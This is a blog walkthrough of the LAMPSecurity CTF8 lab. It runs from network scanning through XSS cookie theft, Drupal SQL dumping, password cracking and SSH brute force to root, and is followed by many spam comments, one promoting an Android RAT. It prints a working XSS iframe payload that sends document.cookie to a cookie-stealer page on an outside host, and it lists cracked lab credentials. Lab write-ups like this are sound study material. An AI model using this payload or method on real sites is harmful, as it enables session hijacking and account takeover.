April 28, 2019

LAMP Security CTF8 Walk through



In this article I am going to capture the flag for the LampSecurity CTF 8 Challenges. This is a beginner level challenge. We will start with scanning the environment and end with getting the root access, In between my target will be capture the hidden flags. So let’s get started.

List of actions:

  •  Scan the network
  •   HTTP enumeration.
  •  Web vulnerability scanning
  •  Spidering Web directory
  •  Session hijack
  •  Crack the password
  •  Brute-forcing SSH credentials
  •  Get the access and capture the flags
  •  Root privilege

Before start the scanning lets discover the network first with netdiscover.


We have successfully discover our target



1      Scan the network
We will start with network scan with nmap. For this lets execute the below command in Kali console.



After the result we found the following ports are open in the output.

-          21
-          22
-          25
-          80
-          110
-          111
-          139
-          143
-          443
-          445
-          993
-          995
-          3306
-          5801,5802,5901,5902,5903,5904
-          6001,6002,6004,6003

Based on the above result it is confirmed there is a web application running on port 80 so we will chose our start point with the same.



2      Web vulnerability scanning
Let’s scan the web application with Nikto and try to discover the present vulnerability.



After the scan we got the below results which is important for our upcoming walk through.
-          Phpinfo.php page is available to access



-          The application is vulnerable to XXS attack.



Now during exploring the web application, let’s check the source code of the home page.



We have successfully captured our first flag.
#flag#550e1bafe077ff0b0b67f4e32f29d751

After got the first flag we will go with the nikto result and try to explore the phpinfo page.



Great!! We have got our second flag in a row.

#flag#550e1bafe077ff0b0b67f4e32f29d751

3      Spidering Web directory
Now come to home page and read any of the article to get further clue.



While exploring the page I have got a new directory which was not displayed during the vulnerability scan. So we will scan the directory using dirb to get any useful information.



After the scanning result I have got something different which push me to think to check further


Lets try to explore the above path and see what else we can get



Bingo! We have got our third flag
#flag#57dbe55b42b307fb4115146d239955d0

4      Session hijack
Now let’s create a user account to get the user access



I have successfully created one user named “iamuser”. Now got any of the blog and try to check if the comment section is vulnerable to XXS.

Enter the below script and click on preview
<script>alert(‘hi’)</script>



From the above result it is clear the application is vulnerable to XSS.

Now we will try to hijack the session cookie of the writer of the blog and forward it to cookie capture application running inside our own server. To know more please click here to read previous article.

For doing this please paste the below HTML code inside the command box and save it.

<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.2/Cookie_stealer.php?c="+document.cookie)> </iframe >
</body>
</html>



Now the above code will give us the session ID whoever visit the comment in the first place. Here we will make the blog writer visit the link to get the cookie id and highjack his session. For doing that we will send the link to him via email and we will wait until and unless he clicks on the link.

Now click on the username 



After that you have to paste the link in contact form and send to the user.



Now wait for couple of minutes we will get the session id inside our server.

We have successfully got the session id

 

Now we will try to get the session by pasting the copied session id using the cookie manager firefox plugin.



Now our next step will be post the sql query and try to fetch the user details.

As we know Drupal’s default table is user and the columns for user and password are user,pass respectively.

So please goto content management and create content, then click on page, now copy and paste the below sql with php code, select the content type as php and then cleck on preview.



You will successfully get the current user details with the md5 password hash.



5      Crack the password
Save it in a file and try to crack using john the ripper tool.


After the cracking process we have got the below results



6      Brute-forcing SSH credentials
Let’s save the users and password in separate files to do our next step which is brute forcing the SSH login.

After that lets execute the below command in the terminal.


And wait to get success message.



So sad, we did not get any success. Still don’t have to worry let’s explore the blogger profile and see if we get any hint further.



From the above screenshot we can see the user Steve is having his user name in the email as spinkton. Similarly we will check each and every user profile by editing the URL and store the user name inside a file.



Now lets try to brute-force again with the new user list.


This time we have got three SUCCESS credentials. Following:

bdio – passw0rd
jharraway – letmein!
spinkton – football123

7      Get the access and capture the flags

Let’s try to login one by one





Great we have got another flag here






Now try to login with the next credential. Nice! We have got another flag inside this.



Let’s move to the next credential. Again! We have got one more flag inside.



8      Root privilege
After all this let’s try to do sudo login to check if this user has root privilege.



Awesome!! We have successfully got the root user.
Thanks for read my article. Please let me know your valuable feedback in the comment section below.








62 comments:

  1. Wow, What an Outstanding post. I found this too much informatics. It is what I was seeking for. I would like to recommend you that please keep sharing such type of info.If possible, Thanks. Integriti Access Control Melbourne

    ReplyDelete
    Replies
    1. Great Article
      Cyber Security Projects

      projects for cse

      Networking Security Projects

      JavaScript Training in Chennai

      JavaScript Training in Chennai

      The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

      Delete
  2. Actually I read it yesterday but I had some thoughts about it and today I wanted to read it again because it is very well written. security company

    ReplyDelete
  3. It has fully emerged to crown Singapore's southern shores and undoubtedly placed her on the global map of residential landmarks. I still scored the more points than I ever have in a season for GS. I think you would be hard pressed to find somebody with the same consistency I have had over the years so I am happy with that. security company

    ReplyDelete
  4. The article was up to the point and described the information very effectively. Thanks to blog author for wonderful and informative post.
    Security Solution firm

    ReplyDelete
  5. It is also the most versatile lamp that you can buy anywhere. modern floor lamps

    ReplyDelete
  6. How important this flexibility is will determine if you want to upgrade to the lamp above. modern floor lamps

    ReplyDelete
  7. breach the security Yes i am totally agreed with this article and i just want say that this article is very nice and very informative article.I will make sure to be reading your blog more. You made a good point but I can't help but wonder, what about the other side? !!!!!!Thanks

    ReplyDelete
  8. sentry mba Androrat Download. The best android RAT (remote-administration tool) introduced with a wide range of functions. It includes Androrat APK & Androrat Binder.

    ReplyDelete
  9. Simply want to say your article is as surprising. The clearness in your post is simply great and i could assume you are an expert on this subject. Well with your permission allow me to grab your feed to keep updated with forthcoming post. Thanks a million and please continue the enjoyable work.
    Salt Lamps
    salt lamps shop UK
    himalayan pink salt lamp uk
    pink salt lamps online
    himalayan salt lamps in United Kingdom
    Pink salt lamp online shop uk
    himalayan salt lamps UK
    pink salt himalayan lamps
    natural himalayan salt lamp
    pink salt himalayan lamps uk
    pink salt lamp price in UK
    natural rock salt lamp online
    salt lamps shop online
    lamps of himalayan pink salt
    salt lamp shop
    salt lamp online
    Salt lamps uk

    ReplyDelete
  10. But the reality is that they are already being watched by human security personnel, undercover store detectives, maintenance personnel, and www.24response.com high-tech surveillance cameras. And, anytime you enter a private facility, the facility has almost carte blanche authority to watch over your every move.

    ReplyDelete
  11. As we as a whole know, whenever we begin discussing the best precious stone table lamp, we need to begin with Waterford Crystal. https://www.insignis.ro/corpuri-de-iluminat/

    ReplyDelete
  12. Nice knowledge gaining article. This post is really the best on this valuable topic. you can visit

    ReplyDelete
  13. Actually, PC security cameras send the pictures to a DVR hard drive with a recorder.Cctv installation

    ReplyDelete
  14. Without fail, your writing style is top professional; even your website also looks amazing thank you for posting. empresa de seguridad

    ReplyDelete
  15. Skip Energy is a Texas Electric Company situated in Houston. Bob Energy's objective is give more than low Texas Electric Rates to our clients. With inventive and adaptable plans, amazing client assistance, and prevalent client rewards, Bounce Energy offers an interesting way to deal with Texas power.electrician

    ReplyDelete
  16. With mixture able security camera DVR frameworks like our Alnet Systems DVR cards, home and entrepreneurs can begin with simple security cameras alone, and basically add permit later for added IP cameras or extra cards for more conventional CCTV cameras. tampa security cameras

    ReplyDelete
  17. Thank you very much for writing such an interesting article on this topic. This has really made me think and I hope to read more. Stainless Steel Screen Doors

    ReplyDelete
  18. Numerous people are ignorant of how weak their normal security system is a result of the way that the wiring utilized in the system can be handily undermined. cctv camera installation near me

    ReplyDelete
  19. When it comes to safeguarding your house, the most obvious place to begin is with the front door. It's surprising how many people in this day and age still leave their doors unlocked, or use poor locks. Even if you live in a rural area, crime occurs where you live. Your doors' strength and durability is important for home security. A home security door is simply a smart investment. Residential Security doors

    ReplyDelete
  20. Creative Web Studio - The Cyber Defense Company bietet als zertifiziertes Unternehmen lösungsorientierte und zeitgemässe ICT-Services für KMUs an Hauptfokus: Cloud, IT-Security und Informatik.Penetration Testing

    ReplyDelete
  21. thanks for this usefull article, waiting for this article like this again. rastreo gps

    ReplyDelete
  22. Psychological warfare is no uncertainty a terrible confronted advancement which has inundated everybody's consideration. So try not to be shocked to observe a huge number of dollars being spent on global counter psychological oppression and law authorization security arrangements.www.boswen.com.au

    ReplyDelete
  23. A wired camera works similarly, then again, actually the sign is shipped off the capacity gadget through wires rather than radio signs.
    Security Camera Installation

    ReplyDelete
  24. I admire this article for the well-researched content and excellent wording. I got so involved in this material that I couldn’t stop reading. I am impressed with your work and skill. Thank you so much. https://singaporesecuritycompany.weebly.com/

    ReplyDelete
  25. Access Control - best poe cctv system uk - Gates - fire alarms. Design Installation & Servicing. Let Contact Fire & Security Supply You with High-Quality Security Systems. View Case Studies. Get A Quote.

    ReplyDelete
  26. You make so many great points here that I read your article a couple of times. Your views are in accordance with my own for the most part. This is great content for your readers. security services singapore

    ReplyDelete
  27. I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. https://securitycompany123.blogspot.com/2021/09/the-commercial-enterprise-owners.html

    ReplyDelete
  28. I really loved reading your blog. It was very well authored and easy to undertand. Unlike additional blogs I have read which are really not tht good. I also found your posts very interesting. In fact after reading, I had to go show it to my friend and he ejoyed it as well! check more info about singapore security guard

    ReplyDelete
  29. star wars todesstern lampe I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article.

    ReplyDelete
  30. I like your post. It is good to see you verbalize from the heart and clarity on this important subject can be easily observed... https://cambodiaservices-website.yolasite.com

    ReplyDelete
  31. I have a hard time describing my thoughts on content, but I really felt I should here. Your article is really great. I like the way you wrote this information. https://securityserviceincambodia348794372.wordpress.com/2022/01/03/a-review-of-a-security-service-in-cambodia/

    ReplyDelete
  32. Since 9/11 the security business has seen a spike sought after. With this interest has come the prerequisite for security experts to viably deal with the capital consumed during the framework time on earth cycle and during retrofit projects. Qualtech Security

    ReplyDelete
  33. You have done a great job on this article. It’s very readable and highly intelligent. You have even managed to make it understandable and easy to read. You have some real writing talent. Thank you. Reliable Security Service in Cambodia

    ReplyDelete
  34. I’m very happy to read this. This is the type of manual that needs to be given and not the random misinformation that is at the other blogs. Appreciate your sharing this best doc. news

    ReplyDelete
  35. I have bookmarked your blog, the articles are way better than other similar blogs.. thanks for a great blog! get info here for cambodia security company

    ReplyDelete
  36. Thanks for taking the time to discuss this, I feel strongly about it and love learning more on this topic. If possible, as you gain expertise, would you mind updating your blog with more information? It is extremely helpful for me. https://penzu.com/p/7a1e7bc2

    ReplyDelete
  37. You make so many great points here that I read your article a couple of times. Your views are in accordance with my own for the most part. This is great content for your readers. security company in cambodia

    ReplyDelete
  38. planet lamp Pretty good post. I just stumbled upon your blog and wanted to say that I have really enjoyed reading your blog posts. Any way I'll be subscribing to your feed and I hope you post again soon. Big thanks for the useful info.

    ReplyDelete
  39. This was really an interesting topic and I kinda agree with what you have mentioned here! security company in sihanoukville

    ReplyDelete
  40. I am happy to find this post Very useful for me, as it contains lot of information. I Always prefer to read The Quality and glad I found this thing in you post. Thanks Uniarch

    ReplyDelete
  41. Great job for publishing such a beneficial web site. Your web log isn’t only useful but it is additionally really creative too. https://teresasean9.wixsite.com/my-site/post/benefits-of-being-a-school-security-guard

    ReplyDelete
    Replies
    1. galaxy lampe A very awesome blog post. We are really grateful for your blog post. You will find a lot of approaches after visiting your post.

      Delete
  42. I wanted to thank you for this excellent read!! I definitely loved every little bit of it. I have you bookmarked your site to check out the new stuff you post. security company in cambodia

    ReplyDelete
  43. Yes i am totally agreed with this article and i just want say that this article is very nice and very informative article.I will make sure to be reading your blog more. You made a good point but I can't help but wonder, what about the other side? !!!!!!Thanks best security company in cambodia

    ReplyDelete
  44. I read that Post and got it fine and informative. security company in phnom penh

    ReplyDelete
  45. Hey, I am so thrilled I found your blog, I am here now and could just like to say thank for a tremendous post and all round interesting website. Please do keep up the great work. I cannot be without visiting your blog again and again. https://security-s-school-1cc6.thinkific.com/courses/your-first-course

    ReplyDelete
  46. Positive site, where did u come up with the information on this posting?I have read a few of the articles on your website now, and I really like your style. Thanks a million and please keep up the effective work. private security company

    ReplyDelete
  47. This particular is usually apparently essential and moreover outstanding truth along with for sure fair-minded and moreover admittedly useful My business is looking to find in advance designed for this specific useful stuffs… nachttischlampe mond

    ReplyDelete
  48. Hello I am so delighted I located your blog, I really located you by mistake, while I was watching on google for something else, Anyways I am here now and could just like to say thank for a tremendous post and a all round entertaining website. Please do keep up the great work. security guard phnom penh

    ReplyDelete
  49. Thank you because you have been willing to share information with us. we will always appreciate all you have done here because I know you are very concerned with our. buy alarm monitoring system

    ReplyDelete
  50. This is my first time i visit here. I found so many interesting stuff in your blog especially its discussion. From the tons of comments on your articles, I guess I am not the only one having all the enjoyment here keep up the good work security guard sihanoukville

    ReplyDelete
  51. It was wondering if I could use this write-up on my other website, I will link it back to your website though.Great Thanks. https://security908s-site.yolasite.com

    ReplyDelete
  52. I was surfing the Internet for information and came across your blog. I am impressed by the information you have on this blog. It shows how well you understand this subject. security alarm in singapore

    ReplyDelete
  53. When you use a genuine service, you will be able to provide instructions, share materials and choose the formatting style. security guard in cambodia

    ReplyDelete
  54. I think this is an informative post and it is very useful and knowledgeable. therefore, I would like to thank you for the efforts you have made in writing this article. cambodian security guard

    ReplyDelete